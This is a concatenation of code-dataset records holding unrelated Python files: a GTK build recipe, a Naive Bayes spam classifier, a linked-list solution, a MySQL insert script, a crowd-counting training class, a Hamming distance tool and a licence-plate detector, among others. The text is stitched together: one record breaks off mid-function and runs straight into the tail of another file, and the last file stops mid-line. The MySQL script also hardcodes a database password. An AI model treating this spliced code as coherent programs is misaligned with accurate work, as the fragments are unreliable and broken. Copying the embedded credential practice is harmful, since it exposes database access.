Package.profile.name == 'darwin':\n\t\t\tfor p in range (2, len (self.sources)):\n\t\t\t\tself.sh ('patch -p1 --ignore-whitespace < \"%{sources[' + str (p) + ']}\"')\n \n\tdef arch_build (self, arch):\n \n\t\tif arch == 'darwin-32':\n\t\t\t\tself.sh ('export CC=\"$CC -arch i386\"')\n\t\t\t\tself.sh ('export CXX=\"$CXX -arch i386\"')\n\t\t\t\tself.local_ld_flags = ['-arch i386', '-DX_LOCALE']\n\t\t\t\tself.local_gcc_flags = ['-arch i386', '-fstrict-aliasing']\n\t\telif arch == 'darwin-64':\n\t\t\t\tself.sh ('export CC=\"$CC -arch x86_64\"')\n\t\t\t\tself.sh ('export CXX=\"$CXX -arch x86_64\"')\n\t\t\t\tself.local_ld_flags = ['-arch x86_64', '-DX_LOCALE']\n\t\t\t\tself.local_gcc_flags = ['-arch x86_64', '-fstrict-aliasing']\n \n\t\tPackage.arch_build (self, arch, defaults = False)\n \n\tdef install(self):\n\t\tPackage.install(self)\n\t\tif Package.profile.name == 'darwin':\n\t\t\tself.install_gtkrc ()\n \n\tdef install_gtkrc(self):\n\t\tgtkrc = self.sources[1]\n\t\torigin = gtkrc if os.path.isabs (gtkrc) else os.path.join (self.package_dir (), gtkrc)\n\t\tdestdir = os.path.join (self.prefix, \"etc\", \"gtk-2.0\")\n\t\tif not os.path.exists (destdir):\n\t\t\tos.makedirs(destdir)\n\t\tself.sh('cp %s %s' % (origin, destdir))\n \nGtkPackage ()\n","sub_path":"packages/gtk+3.py","file_name":"gtk+3.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456993868","text":" # -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Sat May 26 18:19:58 2018\n\n@author: Harini Gowdagere Tulasidas \nPSU ID: 950961342\n@Course : CS 545- Machine Learning\nProgramming Assignment2: Gaussian Naïve Bayes and Logistic Regression to classify \nthe Spambase data from the UCI ML repository\n\"\"\"\nfrom __future__ import division\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import confusion_matrix as cm\nfrom sklearn.metrics import recall_score as recall\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\n\n\n\"\"\" This method splits the dataset such that the test and train data has 2300 instances each \nthe there are 40% spam and 60% no spam instances.\"\"\"\n\ndef 
test_train_split():\n    filename = \"/Users/harinirahul/Desktop/CS - 545 - ML/PA2/spambase/spambase.data\" \n    dataset = np.array(pd.read_csv(filename))\n    temp = np.split(dataset, np.where(np.diff(dataset[:,-1]))[0]+1)\n    \n    spam = temp[0] \n    no_spam = temp[1]\n    np.random.shuffle(spam)\n    np.random.shuffle(no_spam)\n    spam_size = int((len(spam)/2))\n    no_spam_size = int((len(no_spam)/2))\n\n    train_data = np.concatenate((spam[: spam_size, :],no_spam[:no_spam_size,:]), axis =0) \n    test_data = np.concatenate((spam[spam_size: , :],no_spam[no_spam_size:,:]), axis =0)\n    \n    train_labels = train_data[:,-1]\n    train_labels = train_labels.reshape((len(train_labels),1))\n    \n    test_labels = test_data[:,-1]\n    test_labels = test_labels.reshape((len(test_labels),1))\n    \n    return train_data,train_labels,test_data,test_labels\n\n\"\"\"This is a utility method that computes mean and standard deviation for the features.\nIt also replaces the standard deviation with a minimum value of 0.0001 when it is 0. This is done\nto avoid the errors while computing the log \"\"\"\n\ndef mean_and_sd(data):\n    x_mean = np.array(np.mean(data , axis = 0))\n    x_std = np.array(np.std(data , axis = 0))\n    x_std[x_std == 0.0] = 0.0001\n    \n    return x_mean.reshape((len(x_mean),1)) ,x_std.reshape((len(x_std),1))\n\n\"\"\"\nThis method is used to calculate the prior probabilities for both the spam and Non spam classes.\n\"\"\"\ndef calculate_probabilities(dataset):\n    no_spam_count = 0 \n    spam_count = 0\n    no_spam = []\n    spam = []\n    for row in dataset:\n        if row[-1]==1:\n            spam_count+=1\n            spam.append(row) \n        else:\n            no_spam_count+=1\n            no_spam.append(row)\n    \n    no_spam_prior = float(no_spam_count/len(dataset))\n    spam_prior = float(spam_count/len(dataset)) \n    print(\"prior Probability of the spam class: \" ,spam_prior , \"\\n Prior probability of Non Spam class :\", no_spam_prior)\n    log_spam_prior = np.log(spam_prior) \n    log_no_spam_prior = np.log(no_spam_prior) \n    \n    spam = np.array(spam)\n    no_spam = np.array(no_spam) \n    \n    spam_x_mean , spam_x_std = mean_and_sd(spam[: , :57])\n    no_spam_x_mean , no_spam_x_std = mean_and_sd(no_spam[:,:57])\n    return log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std,no_spam_x_mean , no_spam_x_std \n\n\n\"\"\" This method is used to compute the probabilities for the Gaussian Naive Bayes algorithm\nand classifies the instance as spam or non spam \"\"\"\ndef gaussian_naive_bayes_classifier(log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std,row):\n    \n    p_xi_cj_spam=(1/(np.sqrt(2*np.pi) * spam_x_std))*np.exp((-1)* (((row-spam_x_mean)**2)/(2*(spam_x_std**2))))\n    p_xi_cj_no_spam = (1/(np.sqrt(2*np.pi) * no_spam_x_std))*np.exp((-1)* (((row-no_spam_x_mean)**2)/(2*(no_spam_x_std**2))))\n    \"\"\"Clamping zero Gaussian Naive Bayes probabilities to 0.0001 to avoid taking log(0) \"\"\"\n    p_xi_cj_spam[p_xi_cj_spam == 0.0] = 0.0001\n    p_xi_cj_no_spam[p_xi_cj_no_spam == 0.0] = 0.0001\n    \n    log_naive_spam = np.sum(np.log(p_xi_cj_spam)) \n    log_naive_no_spam = np.sum(np.log(p_xi_cj_no_spam))\n    \n    no_spam_val = log_naive_no_spam+log_no_spam_prior \n    spam_val = log_naive_spam+log_spam_prior\n    \n    return np.argmax([no_spam_val ,spam_val ]) \n\n\"\"\"This method makes the final predictions of the Gaussian Naive Bayes Classifier for the dataset. 
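Each test row is reshaped to a column vector and assigned to the class with the larger log-posterior (see gaussian_naive_bayes_classifier above). 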
\"\"\"\ndef predict(train_data,test_data):\n \n log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std = calculate_probabilities(train_data)\n predicted_output = []\n for row in test_data:\n row = row.reshape((len(row),1))\n predicted_output.append(gaussian_naive_bayes_classifier\n (log_spam_prior , log_no_spam_prior ,\n spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std,row))\n return predicted_output\n\n\"\"\"The main method gets the predictions of the classifier and computes the various metrics\nsuch as recall , accuracy and precision and also computes the confusion matrix \"\"\"\n\ndef main():\n train_data,train_labels,test_data,test_labels = test_train_split()\n predicted_output = predict(train_data,test_data[:,:57]) \n print(\"confusion matrix : \\n\" ,cm(test_labels,predicted_output))\n print(\"Recall : \",recall(test_labels,predicted_output))\n print(\"Accuracy:\" , accuracy_score(test_labels,predicted_output)*100 , \"%\" )\n print(\"precision : \",precision_score(test_labels,predicted_output))\n \n \nif __name__== \"__main__\":\n main()\n \n \n\n \n \n \n\n\n","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"257211087","text":"import baconator\nimport proverb \nimport html\nfrom os import system, name \n\ndef strip_tags(s):\n tag = False\n quote = False\n out = \"\"\n\n for c in s:\n if c == '<' and not quote:\n tag = True\n elif c == '>' and not quote:\n tag = False\n elif (c == '\"' or c == \"'\") and tag:\n quote = not quote\n elif not tag:\n out = out + c\n\n return out\n\nsystem('cls') \n\nname = baconator.generate(delimiter=' ', token_len=0) \nprint(\"Hello, your Hollywood generated name is: \" + name)\nprint() \n\nprint(\"Your proverb today, \" + name + \", is ... 
\")\nprint(strip_tags(proverb.saying()))\nprint()\n\ninput(\"Press any key to continue.\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393588849","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n header=ListNode(0)\n header.next=head #记录头\n p1=p2=header\n for i in range(n):p1=p1.next\n while p1.next:\n p1=p1.next\n p2=p2.next\n p2.next=p2.next.next\n return header.next","sub_path":"019.py","file_name":"019.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"625186984","text":"#This program prints out a random fruit\n#author: Carolyn Moorhouse\n\nimport random\n\nfruits = ('Apple', 'Orange', 'Banana', 'Pear', 'Lemon', 'Melon')\n\n#we want a random number between 0 and length-1\n\nindex = random.randint(0, len(fruits)-1)\n\nfruit = fruits[index]\nprint(\"A Random Fruit: {}\".format(fruit))\n","sub_path":"Week03/lab2.3.randomFruit2.py","file_name":"lab2.3.randomFruit2.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"408048437","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2018/8/28 下午4:03 \n# @Author : ComeOnJian \n# @File : data_analy.py\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom collections import defaultdict\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom gensim.models import word2vec\nfrom gensim.models import KeyedVectors\n\n\n# text process\ndef make_vocab(data_se):\n \"\"\"\n :param data_se: list\n \"\"\"\n dict_fre_word = defaultdict(int)\n dict_id2label_word = {}\n dict_label2id_word = {}\n lengths = []\n word_index = 0\n for index in range(len(data_se)):\n # split\n art_splits = data_se[index].split()\n lengths.append(len(art_splits))\n # count\n for word in art_splits:\n dict_fre_word[word] += 1\n if word not in dict_label2id_word:\n dict_id2label_word[word_index] = word\n dict_label2id_word[word] = word_index\n word_index += 1\n\n return dict_fre_word, dict_id2label_word, dict_label2id_word, lengths\n\ndef prune(data, docs, min_df, max_d):\n \"\"\"\n :param docs: (pd.Series) document\n :param min_df: 最小频率(int)\n :param max_df: 最大不超过(float,0.0 bigCount:\n bigCount = count\n bigWord = word\n\nprint(bigWord, bigCount)","sub_path":"python/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552559224","text":"from PIL import Image\n\nimport scipy.io as sio\nfrom numpy.testing import rand\n\n\ndef get():\n datadict = sio.loadmat('data/test_32x32.mat')\n y = datadict['y'].reshape(datadict['y'].shape[0], )\n return datadict['X'].transpose((3, 0, 1, 2)), y\n\nif __name__==\"__main__\":\n X,Y = get()\n for data in X[0:2]:\n img = Image.fromarray(data, 'RGB')\n img.save('my'+str(rand(0))+'.png')\n print(Y[0])\n img.show()","sub_path":"img_conversion_spike.py","file_name":"img_conversion_spike.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"467733040","text":"from tool.config import opt\r\nfrom tool.Meter import AverageMeter, Meter\r\nfrom tool import trans, myLoss\r\nfrom tensorboardX import SummaryWriter\r\nfrom tool.mynms import localmax\r\nfrom tool.eval import eval_acc\r\nfrom tool import vis\r\nimport numpy as np\r\nimport torch\r\nfrom tool.Loader import deNormalize\r\nimport torch.nn as nn\r\nfrom torch.nn import functional as F\r\n\r\n\r\nclass SolverMask(object):\r\n def __init__(self, net, loader, model='train'):\r\n self.net = net\r\n self.writer = SummaryWriter(opt.logdir)\r\n self.model = model\r\n self.scale = 10\r\n # self.loader = loader\r\n if self.model == 'train':\r\n self.epoch = 0\r\n self.vis_fre = opt.vis_fre\r\n self.val_freq = opt.val_freq\r\n self.val_dense_start = opt.val_dense_start\r\n self.lr_decay_start = opt.lr_decay_start\r\n self.max_epoch = opt.max_epoch\r\n self.train_loader, self.val_loader = loader\r\n if opt.optimizer == 'Adam':\r\n self.optimizer = torch.optim.Adam(net.parameters(), lr=opt.lr, weight_decay=opt.weight_decay)\r\n elif opt.optimizer == 'SGD':\r\n self.optimizer = torch.optim.SGD(net.parameters(), lr=opt.lr, weight_decay=opt.weight_decay,\r\n momentum=opt.momentum)\r\n else:\r\n self.optimizer = None\r\n print('optimizer error')\r\n self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=opt.num_epoch_lr_decay,\r\n gamma=opt.lr_decay)\r\n self.record = {'best_mae': 1e20, 'best_mse': 1e20, 'pca': 0, 'gac': 0}\r\n self.best_ckpt_dir = opt.best_ckpt_dir\r\n self.loss2 = nn.MSELoss(reduction='mean')\r\n self.loss_mask = nn.NLLLoss(reduction='mean')\r\n self.writer.add_graph(self.net, input_to_model=torch.randn(1, 3, 240, 240).cuda())\r\n # loss = F.nll_loss(torch.log(mask), target, reduction='mean')\r\n if opt.reuse:\r\n self.load_model(path=opt.reuse_model)\r\n elif self.model == 'test':\r\n self.test_loader = loader\r\n self.load_model(opt.best_ckpt)\r\n\r\n def forward(self):\r\n for epoch in range(self.epoch, self.max_epoch):\r\n self.epoch += 1\r\n self.train()\r\n if self.epoch % self.val_freq == 0 or self.epoch > self.val_dense_start:\r\n self.val()\r\n if self.epoch % opt.num_epoch_lr_decay == 0:\r\n self.scheduler.step()\r\n self.writer.close()\r\n\r\n def train(self):\r\n self.net.train()\r\n mae_meter, mse_meter = AverageMeter(), AverageMeter()\r\n loss1_meter, loss2_meter, loss_meter = AverageMeter(), AverageMeter(), AverageMeter()\r\n cors_meter = Meter()\r\n\r\n print(\"开始第{}次训练\".format(self.epoch))\r\n for index, sample in enumerate(self.train_loader):\r\n # 输入图像和真实标签\r\n imgs = trans.tovariable(sample['image'])\r\n gt_denses = trans.tovariable(sample['dense']) * self.scale\r\n gt_masks = trans.tovariable(sample['mask']) # [N, H, W]\r\n # 预测标签\r\n pre_masks, pre_denses = self.net(imgs) # shape[N, 2, H, W]\r\n # 计算损失\r\n # print(pre_masks.shape, gt_masks.shape)\r\n # print(pre_denses.shape, gt_denses.shape)\r\n loss_mask = self.loss_mask(torch.log(pre_masks), gt_masks)\r\n loss_mse = self.loss2(pre_denses, gt_denses)\r\n loss = loss_mask + loss_mse\r\n\r\n loss1_meter.update(loss_mask)\r\n loss2_meter.update(loss_mse)\r\n loss_meter.update(loss)\r\n print('loss_mask:{}, loss_mse:{}, loss:{}'.format(loss_mask.data, loss_mse.data, loss.data))\r\n\r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n self.optimizer.step()\r\n pre_masks = F.softmax(pre_masks, dim=1)\r\n pre_masks[pre_masks >= 0.5] = 1\r\n pre_masks[pre_masks < 0.5] = 0\r\n\r\n pre_denses = trans.tonumpy(pre_denses) / self.scale\r\n pre_masks = 
trans.tonumpy(pre_masks)\r\n gt_denses = trans.tonumpy(gt_denses) / self.scale\r\n gt_masks = trans.tonumpy(gt_masks)\r\n gt_masks = gt_masks[:, np.newaxis, :, :]\r\n # 预测位置和分数\r\n\r\n my_n_cors = localmax(pre_denses)\r\n # 真实位置和分数\r\n n_cors = localmax(gt_denses)\r\n\r\n for idx in range(len(my_n_cors)):\r\n error = len(my_n_cors[idx]) - len(n_cors[idx])\r\n mae_meter.update(np.abs(error))\r\n mse_meter.update(np.square(error))\r\n\r\n # 位置评测指标\r\n g_count, a_count, p_count = eval_acc(n_cors, my_n_cors, s=8)\r\n cors_meter.update(a_count, p_count, g_count)\r\n\r\n if self.epoch % self.vis_fre == 0:\r\n vis.vis(self.writer, pre_denses[0, 0], gt_denses[0, 0], self.epoch, model='train', mode='den')\r\n vis.vis(self.writer, pre_masks[0, 1], gt_masks[0, 0], self.epoch, model='train', mode='mask')\r\n\r\n # np.savetxt(opt.result + 'train_map/' + path + str(epoch + 1) + '_' + str(index + 1) + 'pre.csv',\r\n # np_mydenses[0, 0, :, :], fmt='%.4f', delimiter=',')\r\n self.writer.add_scalar('train_loss1', loss1_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_loss2', loss2_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_loss', loss_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_mae', mae_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_mse', np.sqrt(mse_meter.avg), self.epoch)\r\n self.writer.add_scalar('train_gca', cors_meter.get_gca(), self.epoch)\r\n self.writer.add_scalar('train_pca', cors_meter.get_pca(), self.epoch)\r\n print('训练epoch:{}, mae:{}, mse:{}, gca{}, pac{}'.format(self.epoch, mae_meter.avg, np.sqrt(mse_meter.avg),\r\n round(cors_meter.get_gca(), 2),\r\n round(cors_meter.get_pca(), 2)))\r\n print('正确人数:{}, 预测人数:{}, 实际人数:{}, 平均损失:{}'.format(cors_meter.a_count, cors_meter.p_count,\r\n cors_meter.g_count, loss_meter.avg))\r\n\r\n def val(self):\r\n self.net.eval()\r\n mae_meter, mse_meter = AverageMeter(), AverageMeter()\r\n loss1_meter, loss2_meter, loss_meter = AverageMeter(), AverageMeter(), AverageMeter()\r\n cors_meter = Meter()\r\n print(\"开始第{}次交叉\".format(self.epoch))\r\n for index, sample in enumerate(self.val_loader):\r\n with torch.no_grad():\r\n # 输入图像和真实标签\r\n imgs = trans.tovariable(sample['image'])\r\n gt_denses = trans.tovariable(sample['dense']) * self.scale\r\n gt_masks = trans.tovariable(sample['mask']) # [N, 1, H, W]\r\n\r\n # 预测标签\r\n pre_masks, pre_denses = self.net(imgs) # shape[N, 2, H, W]\r\n # 计算损失\r\n loss_mask = self.loss_mask(torch.log(pre_masks), gt_masks)\r\n loss_mse = self.loss2(pre_denses, gt_denses)\r\n loss = loss_mask + loss_mse\r\n\r\n loss1_meter.update(loss_mask)\r\n loss2_meter.update(loss_mse)\r\n loss_meter.update(loss)\r\n print('loss_mask:{}, loss_mse:{}, loss:{}'.format(loss_mask.data, loss_mse.data, loss.data))\r\n\r\n pre_masks = F.softmax(pre_masks, dim=1)\r\n pre_masks[pre_masks >= 0.5] = 1\r\n pre_masks[pre_masks < 0.5] = 0\r\n\r\n pre_denses = trans.tonumpy(pre_denses) / self.scale\r\n pre_masks = trans.tonumpy(pre_masks)\r\n gt_denses = trans.tonumpy(gt_denses) / self.scale\r\n gt_masks = trans.tonumpy(gt_masks)\r\n gt_masks = gt_masks[:, np.newaxis, :, :]\r\n # 预测位置和分数\r\n my_n_cors = localmax(pre_denses)\r\n # 真实位置和分数\r\n n_cors = localmax(gt_denses)\r\n\r\n for idx in range(len(my_n_cors)):\r\n error = len(my_n_cors[idx]) - len(n_cors[idx])\r\n mae_meter.update(np.abs(error))\r\n mse_meter.update(np.square(error))\r\n\r\n # 位置评测指标\r\n g_count, a_count, p_count = eval_acc(n_cors, my_n_cors, s=8)\r\n cors_meter.update(a_count, p_count, g_count)\r\n\r\n if self.epoch % self.vis_fre == 0:\r\n 
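# Log one sample's predicted/ground-truth density map and mask to TensorBoard for visual inspection.\r\n                    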
vis.vis(self.writer, pre_denses[0, 0], gt_denses[0, 0], self.epoch, model='val', mode='den')\r\n vis.vis(self.writer, pre_masks[0, 1], gt_masks[0, 0], self.epoch, model='val', mode='mask')\r\n if mae_meter.avg < self.record['best_mae']:\r\n self.record['best_mae'] = mae_meter.avg\r\n self.record['best_mse'] = np.sqrt(mse_meter.avg)\r\n self.record['pca'] = cors_meter.get_pca()\r\n self.record['gca'] = cors_meter.get_gca()\r\n self.save_model()\r\n self.writer.add_scalar('val_loss1', loss1_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_loss2', loss2_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_loss', loss_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_mae', mae_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_mse', np.sqrt(mse_meter.avg), self.epoch)\r\n self.writer.add_scalar('val_gca', cors_meter.get_gca(), self.epoch)\r\n self.writer.add_scalar('val_pca', cors_meter.get_pca(), self.epoch)\r\n print('交叉epoch:{}, mae:{}, mse:{}, gca{}, pac{}'.format(self.epoch, mae_meter.avg, np.sqrt(mse_meter.avg),\r\n round(cors_meter.get_gca(), 2),\r\n round(cors_meter.get_pca(), 2)))\r\n print('正确人数:{}, 预测人数:{}, 实际人数:{}, 平均损失:{}'.format(cors_meter.a_count, cors_meter.p_count,\r\n cors_meter.g_count, loss_meter.avg))\r\n\r\n def test(self):\r\n self.net.eval()\r\n mae_meter, mse_meter = AverageMeter(), AverageMeter()\r\n cors_meter = Meter()\r\n for index, sample in enumerate(self.test_loader):\r\n with torch.no_grad():\r\n # 输入图像和真实标签\r\n imgs = trans.tovariable(sample['image'])\r\n gt_denses = trans.tovariable(sample['dense']) * self.scale\r\n\r\n # 预测标签\r\n pre_denses = self.net(imgs) # shape[N, 1, H, W]\r\n\r\n pre_denses = trans.tonumpy(pre_denses) / self.scale\r\n gt_denses = trans.tonumpy(gt_denses) / self.scale\r\n\r\n # 预测位置和分数\r\n my_n_cors = localmax(pre_denses)\r\n # 真实位置和分数\r\n n_cors = localmax(gt_denses)\r\n\r\n my_munbers = [len(my_n_cors[idx]) for idx in range(len(my_n_cors))]\r\n numbers = [len(n_cors[idx]) for idx in range(len(n_cors))]\r\n print('预测人数:{}'.format(my_munbers))\r\n print('实际人数:{}'.format(numbers))\r\n\r\n imgs = deNormalize(np.array(imgs.cpu()))\r\n for idx in range(len(my_n_cors)):\r\n error = len(my_n_cors[idx]) - len(n_cors[idx])\r\n mae_meter.update(np.abs(error))\r\n mse_meter.update(np.square(error))\r\n np.savetxt(opt.result + 'test_map/' + str(index) + '_' + str(idx) + 'pre.csv', pre_denses[idx, 0],\r\n fmt='%.4f', delimiter=',')\r\n vis.vis_imgCor(imgs[idx], my_n_cors[idx], n_cors[idx],\r\n path=opt.result + 'test_img/' + str(index) + '_' + str(idx) + 'pre.png')\r\n\r\n # 位置评测指标\r\n g_count, a_count, p_count = eval_acc(n_cors, my_n_cors, s=8)\r\n cors_meter.update(a_count, p_count, g_count)\r\n print('mae:{}, mse:{}, gca{}, pac{}'.format(mae_meter.avg, np.sqrt(mse_meter.avg),\r\n round(cors_meter.get_gca(), 2),\r\n round(cors_meter.get_pca(), 2)))\r\n print('正确人数:{}, 预测人数:{}, 实际人数:{}'.format(cors_meter.a_count, cors_meter.p_count, cors_meter.g_count))\r\n\r\n def save_model(self):\r\n name = self.best_ckpt_dir + str(self.epoch) + '_' + str(round(self.record['best_mae'], 2)) + '_' + \\\r\n str(round(self.record['best_mse'], 2)) + '_' + str(round(self.record['pca'], 2)) + '_' + \\\r\n str(round(self.record['gca'], 2)) + '.pth'\r\n best_state = {\r\n 'record': self.record, 'net': self.net.state_dict(), 'optimizer': self.optimizer.state_dict(),\r\n 'scheduler': self.scheduler.state_dict(), 'epoch': self.epoch\r\n }\r\n torch.save(best_state, name)\r\n\r\n def load_model(self, path):\r\n best_state = torch.load(path)\r\n 
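# The network weights are always restored; optimizer, scheduler and epoch state are reloaded below only when resuming training.\r\n        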
self.net.load_state_dict(best_state['net'])\r\n        if self.model == 'train':\r\n            self.record = best_state['record']\r\n            self.epoch = best_state['epoch']\r\n            self.optimizer.load_state_dict(best_state['optimizer'])\r\n            self.scheduler.load_state_dict(best_state['scheduler'])\r\n","sub_path":"ResNet-DC/SolverMask.py","file_name":"SolverMask.py","file_ext":"py","file_size_in_byte":13673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"242979708","text":"# Save the 200 activation codes (or coupons) generated in problem 0001 into a MySQL relational database.\r\nimport x0001\r\nimport pymysql\r\n\r\ndef store_mysql(codelist):\r\n    try:\r\n        conn = pymysql.connect(host=\"192.168.100.123\",user=\"root\",password=\"mysql123\",db=\"mysql\",port=3306)\r\n        cur = conn.cursor()\r\n    except BaseException as e:\r\n        print(e)\r\n    else:\r\n        try:\r\n            cur.execute('CREATE DATABASE IF NOT EXISTS pydb_test')\r\n            cur.execute('use pydb_test')\r\n            sql = '''CREATE TABLE IF NOT EXISTS ACcode(\r\n            id INT NOT NULL AUTO_INCREMENT,\r\n            code VARCHAR(64) NOT NULL,\r\n            primary key (id)\r\n            )'''\r\n            cur.execute(sql)\r\n\r\n            for ch in codelist:\r\n                cur.execute('INSERT INTO ACcode (code) values (%s)', (ch,))\r\n            cur.connection.commit()\r\n        except BaseException as e:\r\n            print(e)\r\n        finally:\r\n            cur.close()\r\n            conn.close()\r\n\r\nif __name__=='__main__':\r\n    list1 = x0001.get_ACCode()\r\n    store_mysql(list1)\r\n\r\n","sub_path":"LuHR_showcode/x0002.py","file_name":"x0002.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"389411950","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : schackartk\nDate   : 2019-04-09\nPurpose: Find Hamm distances between words in files\n\"\"\"\n\nimport argparse\nimport sys\nimport logging\nimport os\n\n# --------------------------------------------------\ndef get_args():\n    \"\"\"get command-line arguments\"\"\"\n    parser = argparse.ArgumentParser(\n        description='Find Hamm distances between words in files',\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument(\n        'files',\n        metavar='FILE',\n        nargs=2,\n        help='Files containing strings for analysis')\n\n    parser.add_argument(\n        '-d',\n        '--debug',\n        help='Turn on debugging',\n        action='store_true')\n\n    return parser.parse_args()\n\n\n# --------------------------------------------------\ndef warn(msg):\n    \"\"\"Print a message to STDERR\"\"\"\n    print(msg, file=sys.stderr)\n\n\n# --------------------------------------------------\ndef die(msg='Something bad happened'):\n    \"\"\"warn() and exit with error\"\"\"\n    warn(msg)\n    sys.exit(1)\n\n# --------------------------------------------------\ndef dist(s1,s2):\n    \"\"\"Hamming-style distance: positional mismatches plus the difference in length, e.g. dist('cat', 'car') == 1\"\"\"\n    return sum(l1 != l2 for l1,l2 in zip(s1,s2)) + abs(len(s1) - len(s2))\n\n# --------------------------------------------------\ndef main():\n    args = get_args()\n    files = args.files\n    words = [[],[]]\n\n    logging.basicConfig(\n        filename='.log',\n        filemode='w',\n        level=logging.DEBUG if args.debug else logging.CRITICAL\n    )\n\n    for f in files:\n        if not os.path.isfile(f):\n            die('\"{}\" is not a file'.format(f)) \n    \n    logging.debug('file1 = {}, file2 = {}'.format(files[0],files[1]))\n\n    for i, fi in enumerate(files):\n        with open(fi) as f:\n            words[i] = [word for line in f for word in line.split()]\n    \n    word_pairs = list(zip(words[0],words[1]))\n    \n    total =0\n    for s1,s2 in word_pairs:\n        distance = dist(s1,s2)\n        logging.debug('s1 = {}, s2 = {}, d = {}'.format(s1,s2,distance))\n        total += distance\n    print(total)\n\n# 
--------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/13-hamm/hamm.py","file_name":"hamm.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"449284085","text":"# Importing necessary packages\r\nimport cv2\r\nimport os\r\nimport sys\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport random\r\nfrom matplotlib import gridspec\r\nfrom collections import Counter\r\nfrom keras.models import model_from_json\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\n# This function locates the plate by using Haar cascade classifier and returns the cropped plate image\r\ndef extract_plate(img):\r\n\timage_copy = img.copy()\r\n\t\r\n\t# Loading the pretrained haar cascade classifier\r\n\tplate_cascade = cv2.CascadeClassifier('./indian_license_plate.xml')\r\n\r\n\t# Detecting the candidate number plates and storing their co-ordinates\r\n\tplate_rect = list(plate_cascade.detectMultiScale(image_copy, scaleFactor = 1.3, minNeighbors = 7))\r\n\t\r\n\t# In case classifier is unable to detect the plate, we stop the program\r\n\tif len(plate_rect)==0:\r\n\t\tprint('Sorry! Unable to detect plate for this image.')\r\n\t\tsys.exit()\r\n\t\treturn -1\r\n\t\r\n\t# Sorting in decreasing order of area (w*h) to get the largest bounding rectangle\r\n\tplate_rect.sort(reverse=True,key=lambda x:x[2]*x[3])\r\n\tx,y,w,h = plate_rect[0]\r\n\t\r\n\t# Adjusting the co-ordinates so that the whole plate gets cropped\r\n\tx-=35 ; w+=70\r\n\ta,b = 2,2\r\n\tplate = image_copy[y+a:y+h-a, x+b:x+w-b, :]\r\n\t\r\n\t# Finally representing the detected contours by drawing rectangles around the edges.\r\n\tcv2.rectangle(image_copy, (x,y), (x+w, y+h), (51,255,25), 2)\r\n\t\r\n\t# Showing the detected plate with cropped plate\r\n\tcv2.imshow(\"Detected Plate\", image_copy) \r\n\tcv2.imshow(\"Cropped Plate\", plate) \r\n\tcv2.waitKey(0)\r\n\t\r\n\t# Returning the plate detected image and cropped plate image with its cordinates\r\n\treturn image_copy,plate,x,y\r\n\r\n# This function processes the plate image for character segmentation\r\ndef process_plate(plate_image):\r\n\t\r\n\t# Applying different filters to make it easy to detect contours of characters in the plate\r\n\t# These steps were found to be the most effective-\r\n\t# Cropped plate-->Grayscale-->Gaussian Blur-->Adaptive Thresholding-->Morphological Opening\r\n\r\n\tgray = cv2.cvtColor(plate_image, cv2.COLOR_BGR2GRAY)\r\n\tblur = cv2.GaussianBlur(gray,(5,5),0)\r\n\tbinary = cv2.threshold(blur, 255, 255,cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\r\n\tkernel3 = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3))\r\n\tthre_mor = cv2.morphologyEx(binary, cv2.MORPH_ERODE, kernel3)\r\n\tthresh2 = cv2.adaptiveThreshold(blur, 255, 